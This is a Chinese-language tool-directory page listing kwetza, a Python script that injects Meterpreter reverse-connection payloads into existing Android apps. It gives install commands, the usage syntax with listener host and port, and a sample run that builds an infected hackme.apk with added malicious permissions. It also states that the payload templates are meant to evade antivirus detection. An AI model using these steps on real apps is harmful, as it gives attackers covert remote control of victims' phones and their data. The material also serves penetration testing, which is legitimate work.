Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
kwetza — Python脚本,用于将Meterpreter payload注入到现有的Android应用中。 | Kitploit
工具/GitHubGitHub/sensepost/kwetza
Android安全Payload生成漏洞利用移动应用渗透测试渗透测试Payload 开发
GitHubsensepost/kwetza

kwetza

Python脚本,用于将Meterpreter payload注入到现有的Android应用中。

查看仓库
644239388年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

介绍

Arsenal

作者:Chris Le Roy (@brompwnie) [email protected]

Kwetza 是一款允许你用 Meterpreter 载荷感染现有 Android 应用程序的工具。

它能做什么?

Kwetza 使用自定义或默认的载荷模板感染现有的 Android 应用程序,以规避防病毒软件的检测。Kwetza 允许你使用目标应用程序的默认权限感染 Android 应用程序,或注入额外权限以获得更多功能。

哪里可以找到博文?

Kwetza 所自动化的手动步骤可在此处找到:https://sensepost.com/blog/2016/kwetza-infecting-android-applications/

获取代码

首先获取代码:

git clone https://github.com/sensepost/kwetza.git

Kwetza 使用 Python 编写,需要 BeautifulSoup,可通过 Pip 安装:

pip install beautifulsoup4

Kwetza 需要安装 Apktool 并使其可通过你的 PATH 访问。安装说明可在此处找到:https://ibotpeaches.github.io/Apktool/install

使用方法

python kwetza.py 要感染的Apk名称.apk https/tcp LHOST LPORT yes/no 自定义类名

  • 要感染的Apk名称.apk = 你想感染的 APK 的名称。
  • https/tcp = 选择 HTTPS 或 TCP 连接
  • LHOST = 你的监听器 IP。
  • LPORT = 你的监听器端口。
  • yes = 包含 "yes" 以向应用注入额外的恶意权限,"no" 则使用应用的默认权限。
  • 自定义类名 = 在此指定自定义 Activity,如果你希望 Kwetza 注入该 Activity。
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

信息

Kwetza 已开发为兼容 Python 2。

Kwetza 默认使用位于 "payload" 文件夹中的模板和密钥库来注入和签名感染后的 apk。

如果你想用自己的证书签名感染的应用程序,请生成一个新的密钥库,将其放在 "payload" 文件夹中,并重命名为现有的密钥库,或者更改 kwetza.py 中的引用。

载荷模板也可进行相同操作。

默认密钥库的密码就是 "password"。

许可证

Kwetza 根据知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 (http://creativecommons.org/licenses/by-nc-sa/4.0) 进行许可。

超出本许可范围的权限可在 http://sensepost.com/contact 获取。

下载工具